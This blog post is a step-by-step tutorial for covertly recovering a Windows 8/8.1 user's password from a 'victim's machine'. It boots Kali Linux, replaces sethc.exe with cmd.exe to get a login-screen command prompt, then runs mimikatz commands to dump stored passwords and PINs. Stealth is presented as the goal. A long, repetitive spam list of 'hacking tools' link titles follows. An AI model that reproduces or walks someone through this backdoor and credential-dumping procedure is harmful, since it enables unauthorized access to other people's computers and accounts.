miércoles, 24 de enero de 2024

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)
More articles
  1. Hacking Tools For Kali Linux
  2. Hacker Tools List
  3. Hack Rom Tools
  4. Pentest Tools Online
  5. Hack Tool Apk No Root
  6. Hacks And Tools
  7. Hacking Tools For Kali Linux
  8. Pentest Tools Alternative
  9. Pentest Recon Tools
  10. Pentest Box Tools Download
  11. Pentest Tools Framework
  12. Pentest Tools For Android
  13. Hacking Tools 2020
  14. Hacker Tools 2019
  15. Nsa Hacker Tools
  16. Hacking Tools Software
  17. Hack Website Online Tool
  18. Pentest Tools List
  19. Wifi Hacker Tools For Windows
  20. Ethical Hacker Tools
  21. Hacker Tools Apk Download
  22. Hack Tools Pc
  23. Pentest Tools List
  24. Hacker Tools For Pc
  25. Hack Apps
  26. Best Hacking Tools 2019
  27. Pentest Reporting Tools
  28. Pentest Tools Subdomain
  29. Kik Hack Tools
  30. Blackhat Hacker Tools
  31. Hacking Tools Kit
  32. Hacker Tools Apk
  33. Nsa Hacker Tools
  34. Hacking Tools For Beginners
  35. Hacker Tools Free
  36. Hack Tools 2019
  37. Hack Tool Apk
  38. Hacker Tools Software
  39. Hacking Tools For Games
  40. Pentest Tools Bluekeep
  41. Hack Tools Github
  42. Hacker Techniques Tools And Incident Handling
  43. Hacking Tools For Windows Free Download
  44. Hacker Tools For Mac
  45. Pentest Tools Review
  46. Termux Hacking Tools 2019
  47. Pentest Tools List
  48. Bluetooth Hacking Tools Kali
  49. Tools Used For Hacking
  50. Best Pentesting Tools 2018
  51. Hacking Tools 2020
  52. Hack Tools Mac
  53. Hack Tools For Pc
  54. Hacker Tools Windows
  55. Black Hat Hacker Tools
  56. How To Install Pentest Tools In Ubuntu
  57. Install Pentest Tools Ubuntu
  58. Hacking Tools 2019
  59. Nsa Hack Tools
  60. Hacker Tools Free
  61. Growth Hacker Tools
  62. Pentest Tools Url Fuzzer
  63. Tools Used For Hacking
  64. Hacking Tools Free Download
  65. How To Make Hacking Tools
  66. Hacker Tools Free Download
  67. Top Pentest Tools
  68. Pentest Tools Review
  69. Tools 4 Hack
  70. Pentest Tools Apk
  71. Pentest Box Tools Download
  72. Hack Tools For Mac
  73. Hacker Tools Github
  74. World No 1 Hacker Software
  75. Hack Tools
  76. Hacking Tools
  77. Hacking Tools Pc
  78. Pentest Tools Free
  79. How To Make Hacking Tools
  80. Hack Tools Mac
  81. Hacking Tools Download
  82. Github Hacking Tools
  83. Hacking Tools For Mac
  84. Hacker Tools 2020
  85. Pentest Tools Website
  86. Pentest Tools Linux
  87. Hacking Tools Software
  88. Hack And Tools
  89. Best Hacking Tools 2020
  90. Hack Tools For Ubuntu
  91. Wifi Hacker Tools For Windows
  92. Hacker Tools Windows
  93. Black Hat Hacker Tools
  94. Hacking Tools 2019
  95. Hacking Tools For Games
  96. Hacking Tools
  97. Hack Tools
  98. Hacker Tools Online
  99. Pentest Tools For Windows
  100. Hacking Tools Windows
  101. Hacker Tools Hardware
  102. Tools Used For Hacking
  103. Physical Pentest Tools
  104. Hack Tool Apk No Root
  105. Hacker Tools For Mac
  106. Usb Pentest Tools
  107. Hacking Tools 2020
  108. Android Hack Tools Github
  109. Nsa Hacker Tools
  110. Pentest Tools Kali Linux
  111. Hack Apps
  112. Hack Tools Github
  113. Hacker Techniques Tools And Incident Handling
  114. Install Pentest Tools Ubuntu
  115. Hack Rom Tools
  116. Hacking Tools Hardware
  117. Hacker Tools For Pc
  118. Game Hacking
  119. How To Install Pentest Tools In Ubuntu
  120. Hacker Tools Online
  121. Hacker Tools
  122. New Hacker Tools
  123. Pentest Tools
  124. Pentest Tools For Ubuntu
  125. Hacker Tools For Windows
  126. Pentest Tools Online
  127. Hack Tools For Ubuntu
  128. Hacking Tools Mac
  129. Hacking App
  130. Hacker Hardware Tools
  131. Hacker Tools For Ios
  132. Growth Hacker Tools
  133. Pentest Tools Website
  134. Hacker Tools Github
  135. Bluetooth Hacking Tools Kali
  136. Hacking Tools And Software
  137. Hacker Security Tools
  138. Hacking Tools Github
  139. Hacker Tools For Pc
  140. Pentest Tools List
  141. Kik Hack Tools
  142. Pentest Tools Windows
  143. Hack Tools Download
  144. Pentest Tools For Ubuntu
  145. Tools For Hacker
  146. Hacking Tools

No hay comentarios:

Publicar un comentario